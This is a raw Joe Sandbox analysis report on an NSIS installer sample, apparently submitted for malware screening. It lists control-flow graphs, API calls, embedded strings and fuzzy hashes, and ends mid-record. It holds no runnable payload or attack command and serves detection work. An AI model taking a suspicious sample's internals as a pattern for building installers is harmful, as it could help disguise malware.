                    control_flow_graph 447 405bbf-405bd7 GetModuleHandleA 448 405be4-405beb GetProcAddress 447->448 449 405bd9-405be2 LoadLibraryA 447->449 450 405bf1-405bf3 448->450 449->448 449->450
                    APIs
                    • GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                    • LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: AddressHandleLibraryLoadModuleProc
                    • String ID:
                    • API String ID: 310444273-0
                    • Opcode ID: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
                    • Instruction ID: e5a37bd0471b14276c9a44c6b696aa1abbb9d0f0bd66a2a471ce49017894d203
                    • Opcode Fuzzy Hash: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
                    • Instruction Fuzzy Hash: 9DE08C32600A1297DA101B609E0896B777CAB89640302C43EF545B2011DB34B825ABAD

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 120 4053f8-405412 call 405bbf 123 405414-405424 call 4059ff 120->123 124 405426-40545e call 405981 120->124 133 405481-4054a9 call 4039fc call 406042 123->133 129 405460-405471 call 405981 124->129 130 405476-40547c lstrcatW 124->130 129->130 130->133 138 405543-405550 call 406042 133->138 139 4054af-4054b4 133->139 145 405552-405559 call 4060ca 138->145 146 40555e-405583 LoadImageW 138->146 139->138 140 4054ba-4054e2 call 405981 139->140 140->138 147 4054e4-4054e8 140->147 145->146 149 405613-40561b call 40141d 146->149 150 405589-4055c8 RegisterClassW 146->150 151 4054ea-4054fb call 4057b3 147->151 152 4054fe-40550a lstrlenW 147->152 163 405625-405630 call 4039fc 149->163 164 40561d-405620 149->164 153 4056e5 150->153 154 4055ce-40560e SystemParametersInfoW CreateWindowExW 150->154 151->152 158 405532-40553e call 405fe6 call 405ab8 152->158 159 40550c-40551a lstrcmpiW 152->159 156 4056e7-4056eb 153->156 154->149 158->138 159->158 162 40551c-405526 GetFileAttributesW 159->162 167 405528-40552a 162->167 168 40552c-40552d call 406015 162->168 173 405636-405653 ShowWindow LoadLibraryW 163->173 174 4056bc-4056c4 call 404b48 163->174 164->156 167->158 167->168 168->158 175 405655-40565a LoadLibraryW 173->175 176 40565c-40566d GetClassInfoW 173->176 182 4056c6-4056cc 174->182 183 4056de-4056e0 call 40141d 174->183 175->176 178 405689-4056ba DialogBoxParamW call 40141d call 4037f0 176->178 179 40566f-405683 GetClassInfoW RegisterClassW 176->179 178->156 179->178 182->164 186 4056d2-4056d9 call 40141d 182->186 183->153 186->164
                    APIs
                      • Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                      • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                      • Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                    • lstrcatW.KERNEL32(004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000,00000006,004CC0A0,00000002,004E00C8,00403650,?), ref: 0040547C
                    • lstrlenW.KERNEL32(LimePhillips,?,?,?,LimePhillips,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000,00000006,004CC0A0), ref: 004054FF
                    • lstrcmpiW.KERNEL32(?,.exe,LimePhillips,?,?,?,LimePhillips,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000), ref: 00405512
                    • GetFileAttributesW.KERNEL32(LimePhillips), ref: 0040551D
                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D00A8), ref: 0040556F
                      • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                    • RegisterClassW.USER32(00473240), ref: 004055BF
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004055D6
                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00405608
                      • Part of subcall function 004039FC: SetWindowTextW.USER32(00000000,004732A0), ref: 00403A97
                    • ShowWindow.USER32(00000005,00000000), ref: 0040563E
                    • LoadLibraryW.KERNEL32(RichEd20), ref: 0040564F
                    • LoadLibraryW.KERNEL32(RichEd32), ref: 0040565A
                    • GetClassInfoW.USER32(00000000,RichEdit20A,00473240), ref: 00405669
                    • GetClassInfoW.USER32(00000000,RichEdit,00473240), ref: 00405676
                    • RegisterClassW.USER32(00473240), ref: 00405683
                    • DialogBoxParamW.USER32(?,00000000,00404F45,00000000), ref: 004056A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                    • String ID: .DEFAULT\Control Panel\International$.exe$@2G$Control Panel\Desktop\ResourceLocale$LimePhillips$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                    • API String ID: 608394941-1413194003
                    • Opcode ID: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
                    • Instruction ID: 3004e29146ce1891a10f4484e48a0599eb6fbea5d6fbf796412b55f756561b6a
                    • Opcode Fuzzy Hash: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
                    • Instruction Fuzzy Hash: 7F7104B0601A11BED710ABA5AD46F6F366CEB44304F40043BF949B62E2DB794D818FAD

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 191 402ee7-402f00 192 402f02 191->192 193 402f09-402f11 191->193 192->193 194 402f13 193->194 195 402f1a-402f1f 193->195 194->195 196 402f21-402f2a call 402ed0 195->196 197 402f2f-402f3c call 402e9e 195->197 196->197 201 402f46-402f4d 197->201 202 402f3e 197->202 204 402f53-402f9a GetTickCount 201->204 205 4030ae-4030b0 201->205 203 402f40-402f41 202->203 208 4030cf-4030d3 203->208 209 402fa0-402fa8 204->209 210 4030cc 204->210 206 4030b2-4030b5 205->206 207 403114-403117 205->207 211 4030b7 206->211 212 4030ba-4030c3 call 402e9e 206->212 213 4030d6-4030dc 207->213 214 403119 207->214 215 402faa 209->215 216 402fad-402fbb call 402e9e 209->216 210->208 211->212 212->202 224 4030c9 212->224 219 4030e1-4030ef call 402e9e 213->219 220 4030de 213->220 214->210 215->216 216->202 225 402fbd-402fc6 216->225 219->202 228 4030f5-403107 WriteFile 219->228 220->219 224->210 227 402fcc-402fec call 406b32 225->227 234 4030a0-4030a2 227->234 235 402ff2-403005 GetTickCount 227->235 230 4030a7-4030a9 228->230 231 403109-40310c 228->231 230->203 231->230 233 40310e-403111 231->233 233->207 234->203 236 403050-403054 235->236 237 403007-40300f 235->237 238 403095-403098 236->238 239 403056-403059 236->239 240 403011-403015 237->240 241 403017-40304d MulDiv wsprintfW call 404a73 237->241 238->209 245 40309e 238->245 243 40307b-403086 239->243 244 40305b-40306f WriteFile 239->244 240->236 240->241 241->236 248 403089-40308d 243->248 244->230 247 403071-403074 244->247 245->210 247->230 249 403076-403079 247->249 248->227 250 403093 248->250 249->248 250->210
                    APIs
                    • GetTickCount.KERNEL32 ref: 00402F59
                    • GetTickCount.KERNEL32 ref: 00402FFA
                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403023
                    • wsprintfW.USER32 ref: 00403036
                    • WriteFile.KERNELBASE(00000000,00000000,00423179,004032FA,00000000), ref: 00403067
                    • WriteFile.KERNEL32(00000000,0041E170,?,00000000,00000000,0041E170,?,000000FF,00000004,00000000,00000000,00000000), ref: 004030FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CountFileTickWrite$wsprintf
                    • String ID: (=C$... %d%%$p!B$pA$pA$y1B
                    • API String ID: 651206458-4072891166
                    • Opcode ID: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
                    • Instruction ID: 169c75f2852f129af83c9b1986440f01f3d96746b5d1a97a5bed7113fa09ea58
                    • Opcode Fuzzy Hash: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
                    • Instruction Fuzzy Hash: 1C617B7190121AEBCF10CF65EA446AF7BB8AF44751F14413BE900B72D0D7B89A40DBA9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 251 40311b-403169 GetTickCount GetModuleFileNameW call 4058fe 254 403175-4031a3 call 405ab8 call 406015 call 405ab8 GetFileSize 251->254 255 40316b-403170 251->255 263 403290-40329e call 402e3a 254->263 264 4031a9 254->264 256 40334a-40334e 255->256 271 4032a4-4032a7 263->271 272 403359-40335e 263->272 265 4031ae-4031c5 264->265 267 4031c7 265->267 268 4031c9-4031cb call 402e9e 265->268 267->268 275 4031d0-4031d2 268->275 273 4032d3-4032fd GlobalAlloc call 402ed0 call 402ee7 271->273 274 4032a9-4032c1 call 402ed0 call 402e9e 271->274 272->256 273->272 302 4032ff-403310 273->302 274->272 297 4032c7-4032cd 274->297 277 403351-403358 call 402e3a 275->277 278 4031d8-4031df 275->278 277->272 282 4031e1-4031f5 call 4058ba 278->282 283 40325b-40325f 278->283 287 403269-40326f 282->287 300 4031f7-4031fe 282->300 286 403261-403268 call 402e3a 283->286 283->287 286->287 293 403271-40327b call 406739 287->293 294 40327e-403288 287->294 293->294 294->265 301 40328e 294->301 297->272 297->273 300->287 304 403200-403207 300->304 301->263 305 403312 302->305 306 403318-40331b 302->306 304->287 307 403209-403210 304->307 305->306 308 40331e-403326 306->308 307->287 309 403212-403219 307->309 308->308 310 403328-403343 SetFilePointer call 4058ba 308->310 309->287 312 40321b-40323b 309->312 313 403348 310->313 312->272 314 403241-403245 312->314 313->256 315 403247-40324b 314->315 316 40324d-403255 314->316 315->301 315->316 316->287 317 403257-403259 316->317 317->287
                    APIs
                    • GetTickCount.KERNEL32 ref: 0040312C
                    • GetModuleFileNameW.KERNEL32(00000000,004E80D8,00002004,?,?,?,00000000,004035D7,?), ref: 00403148
                      • Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                      • Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                    • GetFileSize.KERNEL32(00000000,00000000,004EC0E0,00000000,004D80B8,004D80B8,004E80D8,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00403194
                    Strings
                    • Inst, xrefs: 00403200
                    • Null, xrefs: 00403212
                    • soft, xrefs: 00403209
                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403359
                    • Error launching installer, xrefs: 0040316B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                    • API String ID: 4283519449-527102705
                    • Opcode ID: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
                    • Instruction ID: 9295a41ff54e91ce474836f10c0d971f7d59360bd190e5c91fe05c233bc104c6
                    • Opcode Fuzzy Hash: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
                    • Instruction Fuzzy Hash: 4D51D771900208ABDB119FA5DD85BAE7BA8EF04716F14417FE904B62D1DB7C8E808B9D

                    Control-flow Graph

                    APIs
                    • lstrcatW.KERNEL32(00000000,00000000,FerryTrioStomachElectionRoute,004D40B0,00000000,00000000), ref: 00401917
                    • CompareFileTime.KERNEL32(-00000014,?,FerryTrioStomachElectionRoute,FerryTrioStomachElectionRoute,00000000,00000000,FerryTrioStomachElectionRoute,004D40B0,00000000,00000000), ref: 00401946
                      • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                      • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00423179,771B23A0,00000000), ref: 00404AAB
                      • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ABB
                      • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D,0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ACE
                      • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: FerryTrioStomachElectionRoute
                    • API String ID: 1941528284-1160383050
                    • Opcode ID: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
                    • Instruction ID: b4e8f227fe7a9537edd0b9e90a91ba8e6819ca8d144e35aa4a9caf99775b3aa4
                    • Opcode Fuzzy Hash: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
                    • Instruction Fuzzy Hash: 6941C471A00614AADB10AB758C85EAF3668EF45329F20423BF416B11E2C77C4A91DFAD

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 384 40172d-401741 call 40145c call 405807 389 401743-40175f call 4057b3 CreateDirectoryW 384->389 390 401786-40178a 384->390 399 401761-40176c GetLastError 389->399 400 40177c-401784 389->400 391 4017aa-4017b1 call 401435 390->391 392 40178c-4017a5 call 401435 call 405ab8 SetCurrentDirectoryW 390->392 406 402c58-402c67 391->406 392->406 403 401779 399->403 404 40176e-401777 GetFileAttributesW 399->404 400->389 400->390 403->400 404->400 404->403
                    APIs
                      • Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
                      • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
                      • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832
                    • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000), ref: 00401757
                    • GetLastError.KERNEL32 ref: 00401761
                    • GetFileAttributesW.KERNELBASE(00000000), ref: 0040176F
                    • SetCurrentDirectoryW.KERNELBASE(00000000,004D40B0,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040179F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                    • String ID:
                    • API String ID: 3751793516-0
                    • Opcode ID: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
                    • Instruction ID: e2322852a9c4e47e6d687db6679f044b16e0241981b9ece66bf6cd58216f8cce
                    • Opcode Fuzzy Hash: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
                    • Instruction Fuzzy Hash: 3F01D631904621DBE7206B755D45B6F32A8EF14365B21063BF992F22E2D73C4C81866D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 409 40592d-405939 410 40593a-40596e GetTickCount GetTempFileNameW 409->410 411 405970-405972 410->411 412 40597d-40597f 410->412 411->410 413 405974 411->413 414 405977-40597a 412->414 413->414
                    APIs
                    • GetTickCount.KERNEL32 ref: 0040594B
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403392,004DC0C0,004E00C8), ref: 00405966
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: nsa
                    • API String ID: 1716503409-2209301699
                    • Opcode ID: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
                    • Instruction ID: 0cdccb08d4a0cf0f0df5d656a0a7939b265b1f1c47613fc9c1e0506998bbacb4
                    • Opcode Fuzzy Hash: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
                    • Instruction Fuzzy Hash: C9F06276610608EBDB109F55DE05E9B7BA9EF94720F00803BE984A7190E6B099548B58

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 419 401cc9-401cd4 420 401d26-401d28 419->420 421 401cd6-401cd9 419->421 422 401d49-401d5f GlobalAlloc call 4060ca 420->422 423 401d2a-401d2c 420->423 424 401ce5-401cf3 call 4060ca 421->424 425 401cdb-401cdf 421->425 433 401d64-401d71 422->433 426 401721-401728 423->426 427 401d32-40213f call 405ab8 GlobalFree 423->427 434 401cf9-402a2a call 405ab8 * 3 424->434 425->421 429 401ce1-401ce3 425->429 431 402c58-402c67 426->431 427->431 429->424 429->434 433->431 434->431
                    APIs
                    • GlobalAlloc.KERNELBASE(00000040,0000400C), ref: 00401D50
                      • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040619B
                    • GlobalFree.KERNEL32(007B9B50), ref: 00402139
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Global$AllocFreeVersion
                    • String ID: FerryTrioStomachElectionRoute
                    • API String ID: 2385019812-1160383050
                    • Opcode ID: 442295020a8ec9c410d593e6b55dbcb69a0d183c26179685e54f734f8a1201cf
                    • Instruction ID: 6b75c97ebfe45aa80d571dd756fbca19e350de1e8d26625c3d1a57f244ee0343
                    • Opcode Fuzzy Hash: 442295020a8ec9c410d593e6b55dbcb69a0d183c26179685e54f734f8a1201cf
                    • Instruction Fuzzy Hash: 502102316442159BE720DF588A40B6F73A8FF08758B10413BE942B72D0C7B8D851AB9E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 451 40248e-402492 452 4024c0-4024cd call 40145c 451->452 453 402494-40249f call 40154d 451->453 458 4024db-4024e9 call 401497 452->458 459 4024cf-4024d5 452->459 460 401721-401728 453->460 461 4024a5-4024be call 40145c RegDeleteValueW RegCloseKey 453->461 468 4024eb-4024ed 458->468 459->458 462 402c58-402c67 460->462 461->468 468->462 470 4024f3 468->470 470->462
                    APIs
                      • Part of subcall function 0040154D: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587
                    • RegDeleteValueW.KERNELBASE(00000000,00000000), ref: 004024AF
                    • RegCloseKey.ADVAPI32(00000000), ref: 004024B8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CloseDeleteOpenValue
                    • String ID:
                    • API String ID: 849931509-0
                    • Opcode ID: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
